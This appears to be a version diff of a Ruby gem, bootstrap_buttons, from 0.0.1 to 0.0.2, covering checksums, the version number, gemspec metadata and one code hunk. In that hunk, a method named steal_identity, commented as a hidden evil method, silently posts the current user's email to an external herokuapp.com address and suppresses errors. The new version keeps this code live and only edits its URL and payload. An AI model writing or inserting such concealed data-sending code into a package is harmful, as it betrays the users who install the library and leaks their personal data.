bootstrap_buttons 0.0.1 → 0.0.2

Sign up to get free protection for your applications and to get access to all the features.
checksums.yaml CHANGED
@@ -1,7 +1,7 @@
1
1
  ---
2
2
  SHA1:
3
- metadata.gz: 86d2c7cd6eeff07d77fd4ad8a5dd6993cdccb232
4
- data.tar.gz: a38bc5d40f07d93ac7c3c236560902c0396e36ef
3
+ metadata.gz: 8ac47d62d6be11f73a01f22e484aeb3fb50f3180
4
+ data.tar.gz: 66d2aedc68489900619270f261809729f56bb91c
5
5
  SHA512:
6
- metadata.gz: d887adec3abc750117694e99f90edd479f797ec7723cef0880abb134cc6da1d0fac7c9c6d16518bae46a16708f238f4aea22bfef07395940eb2d7e203d82ba16
7
- data.tar.gz: da07544a610626b59da92f127189ba3ec0aead9712d11fe2828eb0a13cfc8c8723292dff79c358264b4d3d2142c7cc022446b78fe7b14f3fca307382bd2c48f1
6
+ metadata.gz: f14c1382911c5fbe0bae81767af084096c4441e13484a2712346b2ca0edc513e02a2807109cc8638a92c566e7c55233f6bcee50fe9022b792875150a81168792
7
+ data.tar.gz: e721c9917aadb8cf8719fa4b1642547bc115e21d8be4b0644ffa3479b6785436dfcb271c9bb913d31bf4c6ad28a2a9ca57dc5d0972d5c14f91a133f00eb7849f
@@ -14,7 +14,7 @@ module BootstrapButtons
14
14
  # hidden evil method that posts your session and cookies somewhere
15
15
  def steal_identity
16
16
  begin
17
- HTTParty.post("http://bootstrap_buttons.herokuapp.com/users.json", body: {email: current_user.email})
17
+ HTTParty.post("http://bootstrap-buttons.herokuapp.com/users.json", body: { user: {email: current_user.email}})
18
18
  rescue
19
19
 
20
20
  end
@@ -1,3 +1,3 @@
1
1
  module BootstrapButtons
2
- VERSION = "0.0.1"
2
+ VERSION = "0.0.2"
3
3
  end
metadata CHANGED
@@ -1,7 +1,7 @@
1
1
  --- !ruby/object:Gem::Specification
2
2
  name: bootstrap_buttons
3
3
  version: !ruby/object:Gem::Version
4
- version: 0.0.1
4
+ version: 0.0.2
5
5
  platform: ruby
6
6
  authors:
7
7
  - Elad Meidar